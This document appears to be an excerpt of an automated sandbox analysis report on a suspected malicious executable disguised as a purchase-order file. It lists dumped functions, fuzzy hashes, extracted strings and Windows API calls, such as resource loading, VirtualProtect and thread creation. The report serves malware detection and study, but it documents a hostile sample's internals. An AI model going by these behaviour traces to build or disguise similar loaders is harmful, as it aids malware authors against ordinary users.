Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5be83150f19e832ecaef96136cb22cb64ee60f79123bbf055055cf146bdd9585
Instruction ID: 818f90fd4b1002407f4c203d60005200914e1db78526ea16654b4a4c11aaef91
Opcode Fuzzy Hash: 5be83150f19e832ecaef96136cb22cb64ee60f79123bbf055055cf146bdd9585
Instruction Fuzzy Hash: E1214979504600DFDF09DF98E5C0B26BFA5FB84324F60C56EE8094B652C336D446CA62

Function 011AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742094048.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a23a3cc52baeac2cc78fc212fb339c6aaf4e9a1c402bfe0e31e1adbd43c6d74
Instruction ID: 3ede24d68286c1751833cbacb1b9313b1db6f5eb89f3d5a4c812a8a658becbf2
Opcode Fuzzy Hash: 9a23a3cc52baeac2cc78fc212fb339c6aaf4e9a1c402bfe0e31e1adbd43c6d74
Instruction Fuzzy Hash: EE21C2754487809FCB07CF24D994711BF71EF46214F28C5DAD8498F6A7C33A980ACB62

Function 0119D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 1e95febd666c4c7ddb05c88af6ff06dfc33a5038c84026f339f35872dd5b1402
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 6511DC72404280CFDF06CF44E9C4B56BF72FB94324F24C2A9D9090B656C33AE45ACBA2

Function 0119D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 0438bf7abd4c20aa42a3cb7b27c71f4dd7b88c642acb62483df3da1ff50e11a1
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: D311E176404280CFDF06CF54E5C4B16BF71FB84318F24C6A9D8090B256C336D45ACBA2

Function 011AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742094048.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 58ed2f43c17f838455887c9d753a6cdee80a0458a5e37ffc8219eb06dd1c8b88
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 9811BB79504680DFDB06CF54D5C4B15BFA1FB84224F24C6AAD8494B6A6C33AD40ACB62

Function 0119D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b98fbe2f634b14e4e0085e2f9cb256622b24f1029045f9f94945632f2dc692
Instruction ID: 015594ca0cceb52346d03194b90376aa5b21bbd8d4ee8f22776b3c85d03262c3
Opcode Fuzzy Hash: 51b98fbe2f634b14e4e0085e2f9cb256622b24f1029045f9f94945632f2dc692
Instruction Fuzzy Hash: C201FC310087809AEF1C5A99DD8475FBF98DF41328F08C52AED180B146C3399440C672

Function 0119D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 706deef7c5a3343a7c10ff17162386369ee020aecc2183af385ae77f9e24c471
Instruction ID: 5100083c7eed3d3fa0c955bc7d534fc6680509e3c88d9d61656848b025d6da7f
Opcode Fuzzy Hash: 706deef7c5a3343a7c10ff17162386369ee020aecc2183af385ae77f9e24c471
Instruction Fuzzy Hash: 69F0F6710083809EEB148E5ADCC8B66FFA8EF41338F18C45AED080F286C3799840CBB1

Non-executed Functions

Function 05961D88 Relevance: 6.7, Strings: 5, Instructions: 453COMMON

Download Yara Rule

Strings

Hbq, xrefs: 059622A0
(o^q, xrefs: 05962233
(o^q, xrefs: 05962229
,bq, xrefs: 05961FB7
,bq, xrefs: 05961FC7

Memory Dump Source

Source File: 00000000.00000002.1760393104.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5960000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-3486158592
Opcode ID: bce362db7130d05835db1eca94d8f46e0de7a7256470c5ee21914fca30d480e0
Instruction ID: aa5c95420b6e4dd6c60c04540fbc6622baa3c7e703c709745682a73b8895bc0c
Opcode Fuzzy Hash: bce362db7130d05835db1eca94d8f46e0de7a7256470c5ee21914fca30d480e0
Instruction Fuzzy Hash: C4024B39A04615CFCB18CF69C988A6DBBB6FF88750B168169E816DB370DB31EC45CB50

Function 07AC0040 Relevance: 2.8, Strings: 2, Instructions: 298COMMON

Download Yara Rule

Strings

PH^q, xrefs: 07AC022B
PH^q, xrefs: 07AC0303

Memory Dump Source

Source File: 00000000.00000002.1784201616.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ac0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 5abaeae1a66d7f065ac590b48f64b54652061481e06b584e234c1b06ca5b0a7d
Instruction ID: 72865f2c2f43d6a4abd5f0fbd284ab743796ca1e2deb8a00e626f6042da19181
Opcode Fuzzy Hash: 5abaeae1a66d7f065ac590b48f64b54652061481e06b584e234c1b06ca5b0a7d
Instruction Fuzzy Hash: D2D1B574A00605CFDB18DF69C998AAAB7F1BF8D711F2580A8E515AB371DB31AD40CF60

Function 0596DB90 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760393104.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5960000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60bb3da8c980ce5617f6ce139f7b4f258bb23b542d27403c3e9193c6e31cbbf3
Instruction ID: 6c6ca29f24bc1ae9e77161b68d7fc8fa63cd0cc70a93fab5071bad47ad03db87
Opcode Fuzzy Hash: 60bb3da8c980ce5617f6ce139f7b4f258bb23b542d27403c3e9193c6e31cbbf3
Instruction Fuzzy Hash: B7A19170B002544FDB5DBBBC851436F6AABBBC8340F68852CD05AEB798CE389D438795

Analysis Process: PO_2024_056209_MQ04865_ENQ_1045.exePID: 8160, Parent PID: 7708COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	31.6%
Signature Coverage:	18.9%
Total number of Nodes:	449
Total number of Limit Nodes:	42

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

v, xrefs: 00401E4B
', xrefs: 00402006
E, xrefs: 00401E0F
x, xrefs: 0040214A
W, xrefs: 00401B14
W, xrefs: 00401B23
0, xrefs: 00401BBD
v, xrefs: 0040212C
4, xrefs: 00401B64
{, xrefs: 0040211D
[, xrefs: 00401B37
!, xrefs: 004020CF
x, xrefs: 00402088
8, xrefs: 00401BA9
5, xrefs: 00402109
v, xrefs: 00401B5A
6, xrefs: 004020C5
!, xrefs: 0040201A
', xrefs: 00401AF6
{, xrefs: 00401B4B
x, xrefs: 00401B78
v, xrefs: 0040206A
:, xrefs: 00401B28
o, xrefs: 00401B8D
W, xrefs: 00402033
x, xrefs: 00401E69
4, xrefs: 00402136
W, xrefs: 004020E6
", xrefs: 00401B0F
V, xrefs: 00401E19
[, xrefs: 00402047
V, xrefs: 00402038
., xrefs: 00401B0A
*, xrefs: 004020E1
o, xrefs: 00402097
___, xrefs: 0040227D
U, xrefs: 004020F5
*, xrefs: 00401A1F
h, xrefs: 00401A6F
!, xrefs: 00401B1E
), xrefs: 0040202E
D, xrefs: 00401DFB
4, xrefs: 00402074
o, xrefs: 00402159
., xrefs: 0040201F
%, xrefs: 004020FA
{, xrefs: 00401E3C
_._, xrefs: 00402257
{, xrefs: 0040205B

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 02BFCBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

d, xrefs: 02BFC294
w, xrefs: 02BFC289

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-2400632791
Opcode ID: 19109f927d30e16e5193e51d30843697fa20c3c05d1da147f2888d79a20904d8
Instruction ID: 7ab5085091e2ec344b3aabc51904ed195696b7fd9269c362867f25c8c0224a4e
Opcode Fuzzy Hash: 19109f927d30e16e5193e51d30843697fa20c3c05d1da147f2888d79a20904d8
Instruction Fuzzy Hash: 2FC1563194C34CABEAF5DA248C09B767F20EB5562CF4D09D7E746860F2E72189DCC652

Function 02BF8550 Relevance: 21.5, APIs: 14, Instructions: 544COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02BF7FD4
FreeSid.ADVAPI32(?), ref: 02BF8579

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: ErrorFreeLast
String ID:
API String ID: 1762890227-0
Opcode ID: a574a6945b14e5eab42ab038c0475e30d7c28f18a8d5c91604cbe83d6e6bebc4
Instruction ID: aecddd0f81a663002f14acf1b8fcf9c77b58cc4103b4530ee56004668bf3c320
Opcode Fuzzy Hash: a574a6945b14e5eab42ab038c0475e30d7c28f18a8d5c91604cbe83d6e6bebc4
Instruction Fuzzy Hash: 86F16D2590D3809FDBF646284C09735BB61EF56728F4D4BCAF792CA0F2E764490CE252

Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0040CC41
__mtinit.LIBCMT ref: 0040CC47
_fast_error_exit.LIBCMT ref: 0040CC52
__RTC_Initialize.LIBCMT ref: 0040CC58
__ioinit.LIBCMT ref: 0040CC61
__amsg_exit.LIBCMT ref: 0040CC6C
GetCommandLineA.KERNEL32 ref: 0040CC72
___crtGetEnvironmentStringsA.LIBCMT ref: 0040CC7D
__setargv.LIBCMT ref: 0040CC87
__amsg_exit.LIBCMT ref: 0040CC92
__setenvp.LIBCMT ref: 0040CC98
__amsg_exit.LIBCMT ref: 0040CCA3
__cinit.LIBCMT ref: 0040CCAB
__amsg_exit.LIBCMT ref: 0040CCB6

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
String ID:
API String ID: 2598563909-0
Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

Function 02BDCE90 Relevance: 16.2, APIs: 10, Instructions: 1206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137eb3856fe8045d6fb70000a78b4ddc6c7d77b2c6af52e2a5b4a0157cd282ac
Instruction ID: 6d1eb3c378685e02ceb9a6b79fda8417518c15947944e6207adaf24e139213ee
Opcode Fuzzy Hash: 137eb3856fe8045d6fb70000a78b4ddc6c7d77b2c6af52e2a5b4a0157cd282ac
Instruction Fuzzy Hash: 11A27D7250D3828FD735CB18C8447EABBE1EFC5318F09899AE5D997292E335A404CB97

Function 02BDB180 Relevance: 6.1, APIs: 4, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32 ref: 02BDB2BA
WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 02BDB2E0

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 628608e54d0931bb4c88bf7fec04a1eedf92d64cd9bf0ff4476910c6dba7f82a
Instruction ID: c22839ae21d8bec629ccdf4b7cc9dfe6319e7d9978c6cc1e5c6dd06ee2884755
Opcode Fuzzy Hash: 628608e54d0931bb4c88bf7fec04a1eedf92d64cd9bf0ff4476910c6dba7f82a
Instruction Fuzzy Hash: D331616544C3849FE7118B2588157AEBFE0AB9272CF4A85CDE4D986291F3B48408D793

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 02BF7DF0 Relevance: 4.6, APIs: 3, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 02BF7E0F

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 8391bf0671d2a896efd30401de8b8d42d260b12ce17eb9e749a2fcd653a4e1dd
Instruction ID: 59957b5baac4b79084d3d876167b89e8ddd78758b7150afd9d37f27c4dfd640f
Opcode Fuzzy Hash: 8391bf0671d2a896efd30401de8b8d42d260b12ce17eb9e749a2fcd653a4e1dd
Instruction Fuzzy Hash: 2621F4EFA493442BF6F596189C06BB9FA35EB41754FC844C9F78A150E2DF64240CE262

Function 02BD5A3B Relevance: 3.1, APIs: 2, Instructions: 59
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,02BD55C0,?,00000000,00000000), ref: 02BD5A51
RtlExitUserThread.NTDLL(00000000), ref: 02BD5B11

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID:
API String ID: 4108186749-0
Opcode ID: 1435e08a913649254f0bc9989508f4680be10e63e202e71c132b920dffc13f60
Instruction ID: d2a044dd12ce28cffb094d2ddf3a0440987c2061e2fe59ef2ba7bbb64732a696
Opcode Fuzzy Hash: 1435e08a913649254f0bc9989508f4680be10e63e202e71c132b920dffc13f60
Instruction Fuzzy Hash: 0C11675150D3C24FE7338B2888657E6AFA09F53124F8D06D6D5A08E0E2F369590C83A3

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Function 02BD5D20 Relevance: 2.5, APIs: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02BD5D6D

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8d90f0972137776cdfbcd50ab9e155338a8bf24dc0e3c5dfd5eceef02e6e7877
Instruction ID: bc327ccc9581efb48461641524208388978850a9cbc95875c72352e6873d8a98
Opcode Fuzzy Hash: 8d90f0972137776cdfbcd50ab9e155338a8bf24dc0e3c5dfd5eceef02e6e7877
Instruction Fuzzy Hash: F1F0B470A44708EADA3E0768ED4EFF12A10EB0362CFCC55C5E551590B2BB511801D331

Function 02BD5F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8084db7fe03ff08b5bea8a29caa0cd69bb0363bdccbe2ff0434da46ff958726e
Instruction ID: 55c8deb933a2fa454530f2e8a85b675c9abd89ef5abae738f25e567b2fa0100c
Opcode Fuzzy Hash: 8084db7fe03ff08b5bea8a29caa0cd69bb0363bdccbe2ff0434da46ff958726e
Instruction Fuzzy Hash: 1F71063180D3808FD73A5B389494BF5BB64EB46229FCD86DAD0958F1A3F7318444C762

Function 02BD6490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1056c64dc1d1daa616bd39402932bae4c1a1f403756013d8cec8a0a3dcd9bcfe
Instruction ID: bdbe48193aba0754ead2c05ce28c9251aef069eb4e35766f08bd3ac7d8fa92c7
Opcode Fuzzy Hash: 1056c64dc1d1daa616bd39402932bae4c1a1f403756013d8cec8a0a3dcd9bcfe
Instruction Fuzzy Hash: 3D31D87090C3408BCB358B2CE4853F9BBACEB81228F8C85DAD0D58A1A6F7759044CB52

Function 036A9130 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 036A91A4

Memory Dump Source

Source File: 00000008.00000002.1759970381.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_36a0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ffb6f0d1fa6e85d9faf76b4bfcce7fc885375c6203f8f6cae63163fc9cf27103
Instruction ID: 5c9f2c06e43e29dc58316f3721ed48ce4591c862fe559e3d8059ac16b19254a4
Opcode Fuzzy Hash: ffb6f0d1fa6e85d9faf76b4bfcce7fc885375c6203f8f6cae63163fc9cf27103
Instruction Fuzzy Hash: E21136B1D002088FCB10DFAAC884ADEFBF4EF88320F10842AD419A7210C774A944CFA4

Function 02BD6086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 02BD608C

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 177833189c8a37ea15f365f65d816bacc8883835a04bdae2965e86e3fe0bf522
Instruction ID: 3c9fd713c7f5fb6fb5edd2f67a7e0124c55c9706533f2f90042d340d814500b1
Opcode Fuzzy Hash: 177833189c8a37ea15f365f65d816bacc8883835a04bdae2965e86e3fe0bf522
Instruction Fuzzy Hash: 30019271C0D3409FC7398B24A4457F67BBCEF46214F899ADAE1859B1A2F7748444CB62

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
